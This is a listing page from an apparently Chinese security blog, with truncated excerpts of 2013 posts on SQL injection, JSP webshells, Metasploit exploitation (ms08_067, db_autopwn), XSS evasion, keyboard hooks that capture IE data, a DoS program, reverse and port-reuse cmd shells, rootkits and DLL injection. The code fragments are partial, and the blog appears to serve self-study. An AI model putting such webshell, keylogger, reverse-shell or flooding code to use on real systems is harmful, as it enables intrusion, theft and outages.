- 博客(80)
- 收藏
- 关注
RSS订阅原创 Oracle sql injection
先创建一个普通用户并授权:C:\>sqlplus "/as sysdba"SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 7月 31 21:49:45 2013Copyright (c) 1982, 2005, Oracle. All rights reserved.连接到:Personal Oracle Database 1
2013-07-31 22:52:58
1277
原创 mysql sql injection
Version:mysql> SELECT @@version;+------------------+| @@version |+------------------+| 5.0.96-community | +------------------+1 row in set (0.00 sec)Comments:mysql> SELECT 1; #com
2013-07-30 23:20:52
907
原创 linux安装、启动mysql
我下载的文件是MySQL-client-5.0.96-1.glibc23.i386.rpm MySQL-server-5.0.96-1.glibc23.i386.rpm MySQL-shared-5.0.96-1.glibc23.i386.rpm先安装MySQL-shared-5.0.96-1.glibc23.i386.rpm:[root@localhost m
2013-07-30 22:58:14
870
转载 Back Orifice 2000
http://en.wikipedia.org/wiki/Back_Orifice_2000Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a co
2013-07-29 08:25:21
1240
转载 Agobot
http://en.wikipedia.org/wiki/AgobotAgobot, also frequently known as Gaobot, is a family of computer worms. Axel "Ago" Gembe, a German programmer, was responsible for writing the first vers
2013-07-29 08:19:06
999
1
转载 Google hacker的入侵方法
http://baike.baidu.com/view/433742.htmroute print 查看本机设置网络intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.intitle:和上面那个int
2013-07-28 15:08:49
1678
转载 Google Hacking
http://home.ubalt.edu/abento/753/footscan/googlehacking.htmlThis is an introduction to the use of the Google search tools for obtaining information about organizations, servers, vulnerabilities,
2013-07-28 14:08:40
1175
原创 webshell之复杂版本jsp
从http://i8jesus.com/?page_id=205上下载的版本,感谢作者。pwn.jsp:<%!String currentDir = "";PageContext context;HttpSession currentSession;%><%if ( session.getAttribute("pwd") == nu
2013-07-27 23:13:34
3622
原创 webshell之简单版本jsp
从BT5上复制下来的,简单修改了一下:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>cmdjsp<% String cmd = request.getParameter("cmd"); String output = "
2013-07-27 23:09:12
5882
转载 XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_SheetXSS Filter Evasion Cheat SheetContents [hide] 1 Introduction2 Tests2.1 XSS Locator2.2 XSS
2013-07-27 17:43:04
2220
原创 metasploit之db_autopwn实战
msf > db_nmap -O 192.168.1.142[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT[*] Nmap: Nmap scan report for 192.168.1.142[*] Nmap: Host is up (0.00047s latency).[*] Nma
2013-07-27 00:03:38
5660
1
原创 exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show payloadsCompatible Payloads=================== Name Disclosure Dat
2013-07-26 23:52:59
3912
原创 metasploit之hosts
BT5R1:msf > hosts -hUsage: hosts [ options ] [addr1 addr2 ...]OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c On
2013-07-26 23:18:36
1576
原创 metasploit之db_nmap
BT5R1:msf > db_nmap -h[*] Nmap: Nmap 5.51SVN ( http://nmap.org )[*] Nmap: Usage: nmap [Scan Type(s)] [Options] {target specification}[*] Nmap: TARGET SPECIFICATION:[*] Nmap: Can pass hostnames,
2013-07-26 23:15:52
5404
原创 metasploit之db_autopwn
BT5R1:msf > db_autopwn -h[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on
2013-07-26 23:11:50
1301
转载 Easy Pentesting: Metasploit's db_autopwn
http://allanfeid.com/content/easy-pentesting-metasploits-dbautopwnEveryday, life gets easier for script kiddies. These days everything is pretty much automated. I came across the db_autopwn
2013-07-26 23:02:10
970
原创 输入法钩子
分为1个dll工程和1个Win32空工程。新建一个dll空工程,字符集使用多字节字符集。以下是源代码:shurufa.h:#ifndef SHURUFA_H#define SHURUFA_H#include #include #include #include #pragma comment(lib,"Imm32.lib")extern "C" void writ
2013-07-25 22:47:23
1299
原创 C++拒绝服务攻击DOS
#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum, maxthread, port;char *DestIP; //目标IPvoid display(void) // 定义状态提示函数 { static int play = 0;//
2013-07-24 22:56:17
1053
原创 C++单线程TCP扫描器
#include #include #include #pragma comment(lib,"ws2_32.lib")clock_t start, end;float costtime;void usage() { printf("\tusage: tcpscan RemoteIP StartPort-EndPort\n"); printf("\tExample: tcpsca
2013-07-24 22:33:27
981
原创 C++获得主机IP地址
#include#include#pragma comment(lib,"ws2_32.lib")void RetrieveIP(){ WSADATA wsaData; char name[255]; char *ip; //定义IP地址变量 PHOSTENT hostinfo; if (WSAStartup(MAKEWORD(2, 2), &wsaData) == 0) {
2013-07-24 22:16:26
928
原创 C++获取主机信息
#include #include #include #include #define BUF_SIZE 1024// 获取CPU相关信息void GetCPUInfo() { TCHAR CPU[BUF_SIZE]; SYSTEM_INFO systeminfo; // 获取CPU型号 GetSystemInfo(&systeminfo); switch (system
2013-07-24 22:05:37
1633
原创 C++杀进程
源代码:#include #include #include #include #pragma comment(lib,"kernel32.lib")#pragma comment(lib,"advapi32.lib")void EnableDebugPriv() { HANDLE hToken; TOKEN_PRIVILEGES tkp; OpenProcessToken(
2013-07-24 08:38:33
9625
2
原创 C++关机程序
源代码:#include#includeint main() { HANDLE hToken; TOKEN_PRIVILEGES tkp;// 取得系统版本 OSVERSIONINFO osvi; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if (GetVersionEx(&osvi) == 0) return 0
2013-07-24 08:30:40
4393
1
原创 C++下载文件
#include #include #pragma comment(lib,"Urlmon")void main() { HRESULT urldown; urldown = URLDownloadToFile(NULL, L"http://www.exploit-db.com/download/26703/", L"c:\\26703.py", 0, NULL); switch
2013-07-23 23:59:56
1455
1
原创 键盘钩子
keyboard_hook.h:#ifndef KEYBOARD_HOOK_H#define KEYBOARD_HOOK_H#include extern "C" void __declspec(dllexport) SetKbHook();extern "C" void __declspec(dllexport) RemoveKbHook();#endifkeyboard
2013-07-23 23:21:02
646
原创 C++钩子技术窃取IE数据
先生成dllktr.h代码:#ifndef KTR_H#define KTR_H#include extern "C" void __declspec(dllexport) SetKbHook();extern "C" void __declspec(dllexport) RemoveKbHook();#endifktr.cpp:#include "ktr.h"#i
2013-07-23 21:54:25
1663
原创 端口重用打开cmdshell
要重用的端口是tomcat的默认http端口8080。源代码:#include #pragma comment(lib, "ws2_32.lib")#define LISTEN_PORT 8080int main() { WSADATA ws; SOCKET listenFD; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSA
2013-07-22 23:15:43
821
原创 反向连接打开cmdshell
源代码:#include #include #pragma comment(lib,"Ws2_32") #define LISTEN_PORT 9090int main() { WSADATA ws; SOCKET listenFD; int ret; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSASocket(AF_IN
2013-07-22 22:22:13
1084
原创 双管道打开cmdshell
源代码如下:#include #include #include #pragma comment(lib,"Ws2_32") #define SZBUFFER_SIZE 1024#define LST_PORT 9090SOCKET InitializeServer(VOID) { WORD version = MAKEWORD(2, 2); WSADATA wsaDat
2013-07-21 23:41:10
1068
转载 进程通信之二 管道技术第二篇 匿名管道
http://blog.csdn.net/morewindows/article/details/7390441计算机中管道pipe类似于现实世界中的水管道,在一端放入水流,另一端就会流出来。在计算机机中水流自然被数据流所代替了。计算机中管道分为匿名管道和命名管道,本篇将主要介绍用匿名管道来完成这一重定向输出任务,命名管道就留给下一篇来介绍了。先来看看如何创建和使用匿名
2013-07-21 18:09:52
691
转载 Ring 0f Fire : Rootkits and DKOM
http://fluxius.handgrep.se/2011/01/02/ring-0f-fire-rootkits-and-dkom/Many books and papers cover the subject of Rootkits. I wrote this article to describe my first steps.Here, you will l
2013-07-21 14:54:22
2157
原创 加载第一个rootkit
源代码如下,mydriver.c:#include "ntddk.h"VOID CleanUp(IN PDRIVER_OBJECT pDriverObject);NTSTATUS DriverEntry(IN PDRIVER_OBJECT TheDriverObject, IN PUNICODE_STRING TheRegistryPath){ DbgPrint("This is my
2013-07-21 14:43:02
1290
2
原创 windows驱动开发环境搭建
下载WDK,我是在http://www.microsoft.com/en-us/download/details.aspx?id=11800下载的,版本7.1.0。下载Visual DDK,下载地址:http://visualddk.sysprogs.org/download/先安装WDK,然后安装Visual DDK,都直接点下一步就可以了,没有特别设置。安装好后,打
2013-07-20 23:43:43
817
转载 windows xp 驱动开发(三)DDK与WDK WDM的区别
http://blog.csdn.net/chenyujing1234/article/details/7565429最近尝试去了解WINDOWS下的驱动开发,现在总结一下最近看到的资料。 1.首先,先从基础的东西说起,开发WINDOWS下的驱动程序,需要一个专门的开发包,如:开发JAVA程序,我们可能需要一个JDK,开发WINDOWS应用程序,我们需要WINDOWS
2013-07-20 21:57:17
1129
原创 DLL注入notepad.exe
新建一个dll的工程,但是不要选择空项目,这样会自动生成一些简单的.h和.cpp文件,我这里自动生成了stdafx.h、targetver.h、dllmain.cpp、simple_dll.cpp、stdafx.cpp,修改dllmain.cpp,修改为:// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "stdafx.h"#include
2013-07-20 21:42:48
3921
1
原创 DLL注入
源代码如下:#include #include #include #include DWORD GetTargetProcessID(const char *processExeName){ if (processExeName == NULL) { return FALSE; } HANDLE hSnapshot; hSnapshot = CreateToolhe
2013-07-20 18:09:17
985
原创 VS2010创建、调用动态链接库
先新建DLL项目:然后新建dll.h和dll.cpp。dll.h:#ifndef DLL_H#define DLL_Hextern "C" int __declspec(dllexport)add(int a, int b);#endifdll.cpp:#include "dll.h"int add(int a, int b){
2013-07-20 15:37:47
757
原创 VS2010创建、调用静态链接库
先创建静态链接库的工程:这样就创建了静态链接库的工程。然后,新建.h文件和.cpp文件:static.h:#ifndef STATIC_H#define STATIC_Hextern "C" int add(int a, int b);#endifstatic.cpp:#include "static.h"int add
2013-07-20 15:06:07
1340
原创 C++安装、卸载、运行windows service
按照自己的理解,重新实现了一下,代码如下:#include #include #include #define SERVICE_NAME TEXT("system2")SERVICE_STATUS g_status;SERVICE_STATUS_HANDLE g_ServiceStatusHandle;BOOL InstallService() { SC_HANDLE hS
2013-07-19 22:04:54
5353
1
原创 创建、安装、启动windows service
代码如下:#include #include #include #include // 服务名称,如果服务为SERVICE_WIN32_OWN_PROCESS 类型,则服务名称被忽略#define SERVICE_NAME "MyService"// 启动服务入口函数void WINAPI MyServiceMain(DWORD argc, LPTSTR *ar
2013-07-19 21:21:49
1158
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人